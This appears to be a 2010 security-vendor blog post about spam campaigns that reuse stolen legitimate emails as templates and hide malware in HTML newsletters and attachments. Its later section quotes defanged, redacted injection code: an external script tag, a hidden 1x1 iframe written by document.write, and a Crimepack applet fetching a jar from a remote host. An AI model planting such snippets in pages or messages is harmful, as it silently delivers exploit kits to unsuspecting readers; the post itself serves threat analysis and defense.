Recently, Red Condor blocked a spam message that appeared to come from a religious organization in San Francisco, Calif. The message was an invitation to an annual festival the organization was hosting on September 19, 2010. Included with the email was an attachment that turned out to be HTML malware.
We actually contacted the organization, which is legitimate, to ask them about the event and their email marketing efforts. The organization did send out emails to parishioners and friends with a PDF attachment that contained more information about the event. The event, however, was actually on Sept. 12, 2010, and the email invitations had gone out days/weeks prior to the event and prior to when the spam message had been captured. While the organization could not identify who sent the messages, the person we spoke with did verify that the content of the spam messages sounded just like something the organization had sent out to its email list.
It appears that spammers stole the email from a server to be used as a spam template, changed the date to make it current, and replaced the legitimate PDF attachment with a malware attachment. In the very least, in my mind, this evidence rules out the possibility that the spammers are simply making up their spam templates from scratch, or obtaining them from some public forum.
We have mentioned several times recently in blog posts about this new tactic of stealing actual emails to use as spam templates. To this point, we had not been able to verify that this was in fact happening. We now have proof that it is. This example is the first time that we have been able to trace the legitimate email to a real organization, and validate that the content was real and then used in virulent spam messages. The more legitimate the email appears, the better, as scammers are doing this to circumvent spam filters, and coerce users to click on links and attachments.
Stolen Newsletter Templates
In addition to verifying that legitimate emails are being stolen and used as spam templates, we have also discovered that scammers are starting to exploit legitimate HTML-based email newsletters for their spam campaigns.
We recently identified a newsletter that was generated and sent by a legitimate source, yet was riddled with iFrame injections. In other words, the html newsletters contained bits of malicious code, which are executed when the recipients view the message in an html-capable mail client. We doubt that this was done on purpose by the sender; rather it is more likely that some aspect of the marketer’s infrastructure has been compromised by a Trojan, and unbeknownst to the sender, all the html templates the newsletter uses have been infiltrated with the malicious inserts.
The iFrame injection technique is extremely common (and old) on the web and has been getting some press due to the fact that these things are showing up in legitimate ad servers and popular websites, infecting visitors en mass. This is the first time I have ever seen such a case in email though. From what I can gather, the malicious code silently downloads a Trojan as soon as the message is rendered/opened.
An especially nasty aspect of this campaign is that the sender expects these newsletter messages and will likely fish them out of their quarantine if they find them. It would appear like a false positive to them. Most will not realize that indeed it was blocked for a very good reason until it is too late.
According to a VT analysis of the raw email message, only one of 42 anti-virus engines has detected this campaign as malware.
What Else… Exploit Kits
We also recently blocked another campaign that adds a new twist to the PNP saga.
The samples used subject lines and email content that were stolen email sourced templates. Unlike the message mentioned above, the messages also had an HTML attachment that consisted of an essentially identical spoof of common newsletter and service notification messages. For example, we have seen them spoof Xbox Live, Facebook, Twitter, Netflix, StumbleUpon, Picasa, eBay and PayPal.
Randomly inserted in the HTML code of the newsletter/notification emails was an iFrame injection:
<s-cript src=”http://xxxxx.com/iframefile.js“></script>.
This small piece of script caused the browser to execute the following code:
document.write(“<i-frame src=’http://xxxxx.co.cc/get/?refresh=ssl&showtopic=boz&catid=168&on=on’ width=’1′ height=’1′ style=’visibility: hidden;’></iframe>”);
This code runs you smack into an exploit kit, which we were able to substantiate. The specific kit involved is called Crimepack, as they so helpfully included in their exploit code:
<a-pplet code=”cpak.Crimepack.class” archive=”http://xxxxx.co.cc/get/jar5.php” width=”300″ height=”300″>
I’ve seen a couple of other researchers claim a link between the Crimepack and Phoenix exploit kits with some of the activity we describe as PNP, but we had not previously been able to verify it until now.
Simultaneously, there was another form of the campaign that used the stolen email sourced templates, but instead of using the iFrame injected newsletter/notification spoofs, they used the more traditional obfuscated JavaScript in an html attachment to achieve the browser-exploit kit interaction. There was a slight change here too though in that they included a handful of random 8-bit characters for whatever reason.
These are aggressive campaigns, as we have blocked more than two million of these new messages so far.
